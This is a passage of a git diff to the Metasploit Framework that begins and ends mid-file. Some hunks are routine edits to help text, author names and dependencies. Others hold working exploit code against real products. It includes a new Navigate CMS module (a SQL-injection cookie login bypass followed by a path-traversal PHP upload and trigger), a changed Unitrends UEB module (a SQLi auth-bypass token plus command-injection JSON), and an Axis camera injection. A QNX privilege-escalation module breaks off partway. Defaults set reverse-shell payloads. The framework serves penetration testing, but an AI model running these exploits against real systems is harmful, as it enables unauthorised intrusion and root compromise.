YOUR_API_KEY") + print_line(wlan_geolocate_opts.usage) + return + end + log = client.android.wlan_geolocate wlan_list = [] log.each do |x| @@ -592,9 +600,10 @@ class Console::CommandDispatcher::Android return end g = Rex::Google::Geolocation.new + g.set_api_key(api_key) wlan_list.each do |wlan| - g.add_wlan(*wlan) + g.add_wlan(wlan[0], wlan[2]) # bssid, signalstrength end begin g.fetch! @@ -602,7 +611,7 @@ class Console::CommandDispatcher::Android print_error("Error: #{e}") else print_status(g.to_s) - print_status("Google Maps URL: #{g.google_maps_url}") + print_status("Google Maps URL: #{g.google_maps_url}") end end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb index 352f6b6865..83428ec73a 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb @@ -34,12 +34,14 @@ class Console::CommandDispatcher::Core end @@irb_opts = Rex::Parser::Arguments.new( - '-h' => [false, 'Help banner.'], - '-e' => [true, 'Expression to evaluate.']) + '-h' => [false, 'Help menu.' ], + '-e' => [true, 'Expression to evaluate.'] + ) @@load_opts = Rex::Parser::Arguments.new( - '-l' => [false, 'List all available extensions'], - '-h' => [false, 'Help menu.']) + '-h' => [false, 'Help menu.' ], + '-l' => [false, 'List all available extensions.'] + ) # # List of supported commands. @@ -52,8 +54,8 @@ class Console::CommandDispatcher::Core 'channel' => 'Displays information or control active channels', 'exit' => 'Terminate the meterpreter session', 'help' => 'Help menu', - 'irb' => 'Drop into irb scripting mode', - 'pry' => 'Open a Pry session on the current session', + 'irb' => 'Open an interactive Ruby shell on the current session', + 'pry' => 'Open the Pry debugger on the current session', 'use' => 'Deprecated alias for "load"', 'load' => 'Load one or more meterpreter extensions', 'machine_id' => 'Get the MSF ID of the machine attached to the session', @@ -532,7 +534,7 @@ class Console::CommandDispatcher::Core def cmd_irb_help print_line('Usage: irb') print_line - print_line('Execute commands in a Ruby environment') + print_line('Open an interactive Ruby shell on the current session.') print @@irb_opts.usage end @@ -542,7 +544,7 @@ class Console::CommandDispatcher::Core end # - # Runs the IRB scripting shell + # Open an interactive Ruby shell on the current session # def cmd_irb(*args) expressions = [] @@ -561,12 +563,16 @@ class Console::CommandDispatcher::Core framework = client.framework if expressions.empty? - print_status('Starting IRB shell') - print_status('The "client" variable holds the meterpreter client') - print_line + print_status('Starting IRB shell...') + print_status("You are in the \"client\" (session) object\n") - Rex::Ui::Text::IrbShell.new(binding).run + Rex::Ui::Text::IrbShell.new(client).run else + # XXX: No vprint_status here + if framework.datastore['VERBOSE'].to_s == 'true' + print_status("You are executing expressions in #{binding.receiver}") + end + expressions.each { |expression| eval(expression, binding) } end end @@ -574,12 +580,12 @@ class Console::CommandDispatcher::Core def cmd_pry_help print_line 'Usage: pry' print_line - print_line 'Open a Pry session on the current session.' + print_line 'Open the Pry debugger on the current session.' print_line end # - # Open a Pry session on the current session + # Open the Pry debugger on the current session # def cmd_pry(*args) if args.include?('-h') diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb index ecc56039b2..f5a0c9957d 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb @@ -37,13 +37,12 @@ class Console::CommandDispatcher::Kiwi def initialize(shell) super print_line - print_line - print_line(" .#####. mimikatz 2.1.1 20180820 (#{client.session_type})") + print_line(" .#####. mimikatz 2.1.1 20180925 (#{client.session_type})") print_line(" .## ^ ##. \"A La Vie, A L'Amour\"") - print_line(" ## / \\ ## /* * *") - print_line(" ## \\ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )") - print_line(" '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)") - print_line(" '#####' Ported to Metasploit by OJ Reeves `TheColonial` * * */") + print_line(" ## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )") + print_line(" ## \\ / ## > http://blog.gentilkiwi.com/mimikatz") + print_line(" '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )") + print_line(" '#####' > http://pingcastle.com / http://mysmartlogon.com ***/") print_line si = client.sys.config.sysinfo diff --git a/lib/rex/ui/text/dispatcher_shell.rb b/lib/rex/ui/text/dispatcher_shell.rb index 3b6b972202..cc473e3798 100644 --- a/lib/rex/ui/text/dispatcher_shell.rb +++ b/lib/rex/ui/text/dispatcher_shell.rb @@ -454,6 +454,7 @@ module DispatcherShell found = true end rescue ::Interrupt + found = true print_error("#{method}: Interrupted") raise if propagate_errors rescue OptionParser::ParseError => e diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index f0cc7d106a..7498437b48 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.3.47' + spec.add_runtime_dependency 'metasploit-payloads', '1.3.52' # Needed for the next-generation POSIX Meterpreter spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.4.2' # Needed by msfgui and other rpc components @@ -131,6 +131,7 @@ Gem::Specification.new do |spec| spec.add_runtime_dependency 'dnsruby' spec.add_runtime_dependency 'mqtt' spec.add_runtime_dependency 'net-ssh' + spec.add_runtime_dependency 'ed25519' # Adds ed25519 keys for net-ssh spec.add_runtime_dependency 'bcrypt_pbkdf' spec.add_runtime_dependency 'ruby_smb' diff --git a/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb b/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb index f5086898fe..2de378dc3b 100644 --- a/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb +++ b/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb @@ -22,14 +22,14 @@ class MetasploitModule < Msf::Auxiliary }, 'Author' => [ - 'Rob Carr ' # Discovery and Metasploit module + 'rastating' # Discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-2673'], ['WPVDB', '7808'], - ['URL', 'http://blog.rastating.com/wp-easycart-privilege-escalation-information-disclosure'] + ['URL', 'https://rastating.github.io/wp-easycart-privilege-escalation-information-disclosure/'] ], 'DisclosureDate' => 'Feb 25 2015' )) diff --git a/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb b/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb index fa284e6a8b..d67fd75c3b 100644 --- a/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb +++ b/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb @@ -24,8 +24,8 @@ class MetasploitModule < Msf::Auxiliary }, 'Author' => [ - 'Evex', # Vulnerability discovery - 'Rob Carr ' # Metasploit module + 'Evex', # Vulnerability discovery + 'rastating' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => diff --git a/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.rb b/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.rb index 18dd5119c5..0ea751d84e 100644 --- a/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.rb +++ b/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.rb @@ -25,9 +25,6 @@ class MetasploitModule < Msf::Auxiliary ['URL', 'https://nbulischeck.github.io/apple-safari-crash'], ], 'DisclosureDate' => "Sep 15 2018", - 'Actions' => [[ 'WebServer' ]], - 'PassiveActions' => [ 'WebServer' ], - 'DefaultAction' => 'WebServer' ) ) end @@ -36,8 +33,8 @@ class MetasploitModule < Msf::Auxiliary exploit end - def on_request_uri(cli, _request) - print_status('Sending response') + def on_request_uri(cli, request) + print_status("#{cli.peerhost}: Sending response to User-Agent: #{request['User-Agent']}") html = %| diff --git a/modules/auxiliary/dos/http/wordpress_long_password_dos.rb b/modules/auxiliary/dos/http/wordpress_long_password_dos.rb index b8991ce4b5..ba0302986b 100644 --- a/modules/auxiliary/dos/http/wordpress_long_password_dos.rb +++ b/modules/auxiliary/dos/http/wordpress_long_password_dos.rb @@ -18,9 +18,9 @@ class MetasploitModule < Msf::Auxiliary 'License' => MSF_LICENSE, 'Author' => [ - 'Javier Nieto Arevalo', # Vulnerability disclosure - 'Andres Rojas Guerrero', # Vulnerability disclosure - 'Rob Carr ' # Metasploit module + 'Javier Nieto Arevalo', # Vulnerability disclosure + 'Andres Rojas Guerrero', # Vulnerability disclosure + 'rastating' # Metasploit module ], 'References' => [ diff --git a/modules/auxiliary/gather/pimcore_creds_sqli.rb b/modules/auxiliary/gather/pimcore_creds_sqli.rb index 36ea456094..eae64933ce 100644 --- a/modules/auxiliary/gather/pimcore_creds_sqli.rb +++ b/modules/auxiliary/gather/pimcore_creds_sqli.rb @@ -31,6 +31,10 @@ class MetasploitModule < Msf::Auxiliary [ 'CVE', '2018-14058' ], [ 'EDB', '45208' ] ], + 'Notes' => + { + 'SideEffects' => [ IOC_IN_LOGS ] + }, 'DisclosureDate' => 'Aug 13, 2018' )) diff --git a/modules/auxiliary/gather/wp_all_in_one_migration_export.rb b/modules/auxiliary/gather/wp_all_in_one_migration_export.rb index 39e806e03c..afa907ab66 100644 --- a/modules/auxiliary/gather/wp_all_in_one_migration_export.rb +++ b/modules/auxiliary/gather/wp_all_in_one_migration_export.rb @@ -18,8 +18,8 @@ class MetasploitModule < Msf::Auxiliary 'License' => MSF_LICENSE, 'Author' => [ - 'James Golovich', # Disclosure - 'Rob Carr ' # Metasploit module + 'James Golovich', # Disclosure + 'rastating' # Metasploit module ], 'References' => [ diff --git a/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb b/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb index 6a5ed82bc1..e2e3eea707 100644 --- a/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb +++ b/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb @@ -23,8 +23,8 @@ class MetasploitModule < Msf::Auxiliary 'License' => MSF_LICENSE, 'Author' => [ - 'James Hooker', # Disclosure - 'Rob Carr ' # Metasploit module + 'James Hooker', # Disclosure + 'rastating' # Metasploit module ], 'References' => [ diff --git a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb index 6df8e11fa4..4e17c90277 100644 --- a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb +++ b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb @@ -40,10 +40,7 @@ class MetasploitModule < Msf::Auxiliary ], 'DisclosureDate' => 'Sep 24 2014', 'License' => MSF_LICENSE, - 'Notes' => - { - 'AKA' => ['Shellshock'] - } + 'Notes' => {'AKA' => ['Shellshock']} )) register_options([ diff --git a/modules/exploits/linux/http/axis_srv_parhand_rce.rb b/modules/exploits/linux/http/axis_srv_parhand_rce.rb index b3f3d68bcb..10caf872b8 100644 --- a/modules/exploits/linux/http/axis_srv_parhand_rce.rb +++ b/modules/exploits/linux/http/axis_srv_parhand_rce.rb @@ -12,12 +12,12 @@ class MetasploitModule < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Axis Network Camera .srv to parhand RCE', - 'Description' => %q{ + 'Name' => 'Axis Network Camera .srv to parhand RCE', + 'Description' => %q{ This module exploits an auth bypass in .srv functionality and a command injection in parhand to execute code as the root user. }, - 'Author' => [ + 'Author' => [ 'Or Peles', # Vulnerability discovery (VDOO) 'wvu', # Metasploit module 'sinn3r', # Metasploit module @@ -28,40 +28,62 @@ class MetasploitModule < Msf::Exploit::Remote 'Chris Lee', # Metasploit module 'Cale Black' # Metasploit module ], - 'References' => [ + 'References' => [ ['CVE', '2018-10660'], ['CVE', '2018-10661'], ['CVE', '2018-10662'], ['URL', 'https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/'], ['URL', 'https://www.axis.com/files/faq/Advisory_ACV-128401.pdf'] ], - 'DisclosureDate' => 'Jun 18 2018', - 'License' => MSF_LICENSE, - 'Platform' => ['unix', 'linux'], - 'Arch' => [ARCH_CMD, ARCH_ARMLE], - 'Privileged' => true, - 'Targets' => [ + 'DisclosureDate' => 'Jun 18 2018', + 'License' => MSF_LICENSE, + 'Platform' => ['unix', 'linux'], + 'Arch' => [ARCH_CMD, ARCH_ARMLE], + 'Privileged' => true, + 'Targets' => [ ['Unix In-Memory', - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Type' => :unix_memory, - 'Payload' => { - 'BadChars' => ' ', - 'Encoder' => 'cmd/ifs', - 'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'netcat-e'} - } + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Type' => :unix_memory, + 'Payload' => { + 'BadChars' => ' ', + 'Encoder' => 'cmd/ifs', + 'Compat' => { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'netcat-e' + } + }, + 'DefaultOptions' => { + 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' + } ], ['Linux Dropper', - 'Platform' => 'linux', - 'Arch' => ARCH_ARMLE, - 'Type' => :linux_dropper + 'Platform' => 'linux', + 'Arch' => ARCH_ARMLE, + 'Type' => :linux_dropper, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp' + } ] ], - 'DefaultTarget' => 1, - 'DefaultOptions' => {'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'} + 'DefaultTarget' => 1, + 'DefaultOptions' => {'WfsDelay' => 10} )) end + def check + res = send_request_cgi( + 'method' => 'GET', + 'uri' => "/index.html/#{rand_srv}" + ) + + if res && res.code == 204 + return CheckCode::Appears + end + + CheckCode::Safe + end + def exploit case target['Type'] when :unix_memory @@ -72,8 +94,6 @@ class MetasploitModule < Msf::Exploit::Remote end def execute_command(cmd, opts = {}) - rand_srv = "#{Rex::Text.rand_text_alphanumeric(8..42)}.srv" - send_request_cgi( 'method' => 'POST', 'uri' => "/index.html/#{rand_srv}", @@ -81,7 +101,7 @@ class MetasploitModule < Msf::Exploit::Remote 'action' => 'dbus', 'args' => dbus_send( method: :set_param, - param: "string:root.Time.DST.Enabled string:;#{cmd}" + param: "string:root.Time.DST.Enabled string:;(#{cmd})&" ) } ) @@ -111,4 +131,8 @@ class MetasploitModule < Msf::Exploit::Remote args end + def rand_srv + "#{Rex::Text.rand_text_alphanumeric(8..42)}.srv" + end + end diff --git a/modules/exploits/linux/http/hp_van_sdn_cmd_inject.rb b/modules/exploits/linux/http/hp_van_sdn_cmd_inject.rb index f554cc5753..beb2735f90 100644 --- a/modules/exploits/linux/http/hp_van_sdn_cmd_inject.rb +++ b/modules/exploits/linux/http/hp_van_sdn_cmd_inject.rb @@ -16,8 +16,8 @@ class MetasploitModule < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'HP VAN SDN Controller Root Command Injection', - 'Description' => %q{ + 'Name' => 'HP VAN SDN Controller Root Command Injection', + 'Description' => %q{ This module exploits a hardcoded service token or default credentials in HPE VAN SDN Controller <= 2.7.18.0503 to execute a payload as root. @@ -27,36 +27,36 @@ class MetasploitModule < Msf::Exploit::Remote If the service token option TOKEN is blank, USERNAME and PASSWORD will be used for authentication. An additional login request will be sent. }, - 'Author' => [ + 'Author' => [ 'Matt Bergin', # Vulnerability discovery and Python exploit 'wvu' # Metasploit module and additional ~research~ ], - 'References' => [ + 'References' => [ ['EDB', '44951'], ['URL', 'https://korelogic.com/Resources/Advisories/KL-001-2018-008.txt'] ], - 'DisclosureDate' => 'Jun 25 2018', - 'License' => MSF_LICENSE, - 'Platform' => ['unix', 'linux'], - 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], - 'Privileged' => true, - 'Targets' => [ + 'DisclosureDate' => 'Jun 25 2018', + 'License' => MSF_LICENSE, + 'Platform' => ['unix', 'linux'], + 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], + 'Privileged' => true, + 'Targets' => [ ['Unix In-Memory', - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Type' => :unix_memory, - 'Payload' => {'BadChars' => ' '}, - 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'} + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Type' => :unix_memory, + 'Payload' => {'BadChars' => ' '}, + 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'} ], ['Linux Dropper', - 'Platform' => 'linux', - 'Arch' => [ARCH_X86, ARCH_X64], - 'Type' => :linux_dropper, - 'DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'} + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Type' => :linux_dropper, + 'DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'} ] ], - 'DefaultTarget' => 0, - 'DefaultOptions' => {'RPORT' => 8081, 'SSL' => true} + 'DefaultTarget' => 0, + 'DefaultOptions' => {'RPORT' => 8081, 'SSL' => true} )) register_options([ diff --git a/modules/exploits/linux/http/ueb9_api_storage.rb b/modules/exploits/linux/http/ueb_api_rce.rb similarity index 56% rename from modules/exploits/linux/http/ueb9_api_storage.rb rename to modules/exploits/linux/http/ueb_api_rce.rb index ecbd7bea32..190af58075 100644 --- a/modules/exploits/linux/http/ueb9_api_storage.rb +++ b/modules/exploits/linux/http/ueb_api_rce.rb @@ -11,18 +11,21 @@ class MetasploitModule < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Unitrends UEB 9 http api/storage remote root', + 'Name' => 'Unitrends UEB http api remote code execution', 'Description' => %q{ It was discovered that the api/storage web interface in Unitrends Backup (UB) before 10.0.0 has an issue in which one of its input parameters was not validated. A remote attacker could use this flaw to bypass authentication and execute arbitrary commands with root privilege on the target system. + UEB v9 runs the api under root privileges and api/storage is vulnerable. + UEB v10 runs the api under limited privileges and api/hosts is vulnerable. }, 'Author' => [ 'Cale Smith', # @0xC413 'Benny Husted', # @BennyHusted - 'Jared Arave' # @iotennui + 'Jared Arave', # @iotennui + 'h00die' ], 'License' => MSF_LICENSE, 'Platform' => 'linux', @@ -31,14 +34,18 @@ class MetasploitModule < Msf::Exploit::Remote 'References' => [ ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000TO5PAAW/000005756'], + ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/000006002'], ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12478'], + ['URL', 'http://blog.redactedsec.net/exploits/2018/01/29/UEB9.html'], + ['EDB', '44297'], ['CVE', '2017-12478'], + ['CVE', '2018-6328'] ], 'Targets' => [ - [ 'UEB 9.*', { } ] + [ 'UEB 9.*', { 'Privileged' => true} ], + [ 'UEB < 10.1.0', { 'Privileged' => false} ] ], - 'Privileged' => true, 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', 'SSL' => true @@ -53,6 +60,28 @@ class MetasploitModule < Msf::Exploit::Remote deregister_options('SRVHOST', 'SRVPORT') end + def auth_token + session = "v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0" #SQLi auth bypass + Base64.strict_encode64(session) #b64 encode session token + end + + def check + res = send_request_cgi!({ + 'method' => 'GET', + 'uri' => '/api/systems/details', + 'ctype' => 'application/json', + 'headers' => + {'AuthToken' => auth_token} + }) + if res && res.code == 200 + print_good("Good news, looks like a vulnerable version of UEB.") + return CheckCode::Appears + else + print_bad('Host does not appear to be vulnerable.') + end + return CheckCode::Safe + end + #substitue some charactes def filter_bad_chars(cmd) cmd.gsub!("\\", "\\\\\\") @@ -60,23 +89,27 @@ class MetasploitModule < Msf::Exploit::Remote end def execute_command(cmd, opts = {}) - session = "v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0" #SQLi auth bypass - session = Base64.strict_encode64(session) #b64 encode session token - - #substitue the cmd into the hostname parameter - parms = %Q|{"type":4,"name":"_Stateless","usage":"stateless","build_filesystem":1,"properties":{"username":"aaaa","password":"aaaa","hostname":"`| - parms << filter_bad_chars(cmd) - parms << %Q|` &","port":"2049","protocol":"nfs","share_name":"aaa"}}| - + if target.name == 'UEB 9.*' + #substitue the cmd into the hostname parameter + parms = %Q|{"type":4,"name":"_Stateless","usage":"stateless","build_filesystem":1,"properties":{"username":"aaaa","password":"aaaa","hostname":"`| + parms << filter_bad_chars(cmd) + parms << %Q|` &","port":"2049","protocol":"nfs","share_name":"aaa"}}| + uri = '/api/storage' + elsif target.name == 'UEB < 10.1.0' + parms = %Q|{"name":"ffff","ip":"10.0.0.200'\\"`0&| + parms << filter_bad_chars(cmd) + parms << %Q|`'"}| + uri = '/api/hosts' + end res = send_request_cgi({ - 'uri' => '/api/storage', + 'uri' => uri, 'method' => 'POST', 'ctype' => 'application/json', 'encode_params' => false, 'data' => parms, 'headers' => - {'AuthToken' => session} + {'AuthToken' => auth_token} }) if res && res.code != 500 @@ -87,7 +120,8 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit - print_status("#{peer} - pwn'ng ueb 9....") + print_status("#{peer} - Sending requests to UEB...") execute_cmdstager(:linemax => 120) end end + diff --git a/modules/exploits/linux/local/lastore_daemon_dbus_priv_esc.rb b/modules/exploits/linux/local/lastore_daemon_dbus_priv_esc.rb index 002806dd9c..095de2f6df 100644 --- a/modules/exploits/linux/local/lastore_daemon_dbus_priv_esc.rb +++ b/modules/exploits/linux/local/lastore_daemon_dbus_priv_esc.rb @@ -18,13 +18,14 @@ class MetasploitModule < Msf::Exploit::Local This module attempts to gain root privileges on Deepin Linux systems by using lastore-daemon to install a package. - The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any + The lastore-daemon D-Bus configuration on Deepin Linux permits any user in the sudo group to install arbitrary system packages without providing a password, resulting in code execution as root. By default, the first user created on the system is a member of the sudo group. - This module has been tested successfully with lastore-daemon version - 0.9.53-1 on Deepin Linux 15.5 (x64). + This module has been tested successfully with lastore-daemon versions + 0.9.53-1 on Deepin Linux 15.5 (x64); and + 0.9.66-1 on Deepin Linux 15.7 (x64). }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/multi/fileformat/ghostscript_failed_restore.rb b/modules/exploits/multi/fileformat/ghostscript_failed_restore.rb index 3e3ffcdd13..df9f35e139 100644 --- a/modules/exploits/multi/fileformat/ghostscript_failed_restore.rb +++ b/modules/exploits/multi/fileformat/ghostscript_failed_restore.rb @@ -45,20 +45,20 @@ class MetasploitModule < Msf::Exploit 'Privileged' => false, 'Targets' => [ ['Unix (In-Memory)', - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Type' => :unix_memory, - 'Payload' => {'Space' => 4089, 'DisableNops' => true} # 4096 total + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Type' => :unix_memory, + 'Payload' => {'Space' => 4089, 'DisableNops' => true} # 4096 total ], ['PowerShell (In-Memory)', - 'Platform' => 'win', - 'Arch' => [ARCH_X86, ARCH_X64], - 'Type' => :psh_memory + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Type' => :psh_memory ], ['Linux (Dropper)', - 'Platform' => 'linux', - 'Arch' => [ARCH_X86, ARCH_X64], - 'Type' => :linux_dropper + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Type' => :linux_dropper ] ], 'DefaultTarget' => 0 diff --git a/modules/exploits/multi/http/navigate_cms_rce.rb b/modules/exploits/multi/http/navigate_cms_rce.rb new file mode 100644 index 0000000000..17a3199043 --- /dev/null +++ b/modules/exploits/multi/http/navigate_cms_rce.rb @@ -0,0 +1,128 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Navigate CMS Unauthenticated Remote Code Execution', + 'Description' => %q( + This module exploits insufficient sanitization in the database::protect + method, of Navigate CMS versions 2.8 and prior, to bypass authentication. + + The module then uses a path traversal vulnerability in navigate_upload.php + that allows authenticated users to upload PHP files to arbitrary locations. + Together these vulnerabilities allow an unauthenticated attacker to + execute arbitrary PHP code remotely. + + This module was tested against Navigate CMS 2.8. + ), + 'Author' => + [ + 'Pyriphlegethon' # Discovery / msf module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2018-17552'], # Authentication bypass + ['CVE', '2018-17553'] # File upload + ], + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + ['Automatic', {}] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Sep 26 2018')) + + register_options [ + OptString.new('TARGETURI', [true, 'Base Navigate CMS directory path', '/navigate/']), + ] + end + + def login_bypass + check_resp = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, '/login.php') + ) + + login_bypass_resp = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, '/login.php'), + 'cookie' => 'navigate-user=\" OR TRUE--%20' + ) + + if login_bypass_resp && + login_bypass_resp.code == 302 && + check_resp.body.include?('Navigate CMS') + session_id = login_bypass_resp.get_cookies_parsed + .values.select { |v| v.to_s.include?('NVSID_') } + .first.first + return session_id + end + end + + def check + return CheckCode::Vulnerable if login_bypass + CheckCode::Safe + end + + def exploit + session_id = login_bypass + fail_with(Failure::NoAccess, 'Login bypass failed') unless session_id + + print_good('Login bypass successful') + + php = payload.encoded + data = Rex::MIME::Message.new + data.add_part(php, 'image/jpeg', nil, + "form-data; name=\"file\"; filename=\"#{rand_text_alphanumeric(10..15)}\"") + data_post = data.to_s + + upload = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, '/navigate_upload.php'), + 'vars_get' => Hash[{ + 'session_id' => session_id, + 'engine' => 'picnik', + 'id' => '../../../navigate_info.php' + }.to_a.shuffle], + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'data' => data_post + ) + + fail_with(Failure::Unreachable, 'Unable to reach target') unless upload + fail_with(Failure::Unknown, 'Upload unsuccessful') unless upload.code == 200 + + print_good('Upload successful') + + print_status('Triggering payload...') + send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, '/navigate_info.php') + ) + end + + def on_new_session(session) + super + if session.type != 'meterpreter' + print_error('Unable to restore navigate_info.php') + return + end + + session.core.use('stdapi') if !session.ext.aliases.include?('stdapi') + + begin + session.fs.file.open('navigate_info.php', 'w').write("") + rescue + print_error('Unable to restore navigate_info.php') + end + end +end diff --git a/modules/exploits/multi/http/wp_ninja_forms_unauthenticated_file_upload.rb b/modules/exploits/multi/http/wp_ninja_forms_unauthenticated_file_upload.rb index 32025f6df2..31d42c70b5 100644 --- a/modules/exploits/multi/http/wp_ninja_forms_unauthenticated_file_upload.rb +++ b/modules/exploits/multi/http/wp_ninja_forms_unauthenticated_file_upload.rb @@ -22,8 +22,8 @@ class MetasploitModule < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ - 'James Golovich', # Discovery and disclosure - 'Rob Carr ' # Metasploit module + 'James Golovich', # Discovery and disclosure + 'rastating' # Metasploit module ], 'References' => [ diff --git a/modules/exploits/qnx/local/ifwatchd_priv_esc.rb b/modules/exploits/qnx/local/ifwatchd_priv_esc.rb new file mode 100644 index 0000000000..df457c226d --- /dev/null +++ b/modules/exploits/qnx/local/ifwatchd_priv_esc.rb @@ -0,0 +1,118 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::Linux::Priv + include Msf::Post::File + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ifwatchd Privilege Escalation', + 'Description' => %q{ + This module attempts to gain root privileges on QNX 6.4.x and 6.5.x + systems by exploiting the ifwatchd suid executable. + + ifwatchd allows users to specify scripts to execute using the '-A' + command line argument; however, it does not drop privileges when + executing user-supplied scripts, resulting in execution of arbitrary + commands as root. + + This module has been tested successfully on QNX Neutrino 6.5.0 (x86) + and 6.5.0 SP1 (x86). + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'cenobyte', # Discovery and exploit + 'Tim Brown', # Independent discovery + 'Brendan Coles' # Metasploit + ], + 'References' => + [ + ['CVE', '2014-2533'], + ['BID', '66449'], + ['EDB', '32153'], + ['URL', 'http://seclists.org/bugtraq/2014/Mar/66'] + ], + 'DisclosureDate' => 'Mar 10 2014', + 'Platform' => 'unix', # QNX + 'Arch' => ARCH_CMD, + 'SessionTypes' => %w(shell meterpreter), + 'Targets' => [['Automatic', {}]], + 'Privileged' => true, + 'Payload' => + { + 'BadChars' => '', + 'DisableNops' => true, + 'Space' => 1024, + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'gawk generic' + } + }, + 'DefaultOptions' => + { + 'WfsDelay' => 10, + 'PAYLOAD' => 'cmd/unix/reverse_awk' + } + )) + register_advanced_options [ + OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) + ] + end + + def ifwatchd_path + '/sbin/ifwatchd' + end + + def base_dir + datastore['WritableDir'] + end + + def check + unless setuid? ifwatchd_path + vprint_error "#{ifwatchd_path} is not setuid" + return CheckCode::Safe + end + vprint_good 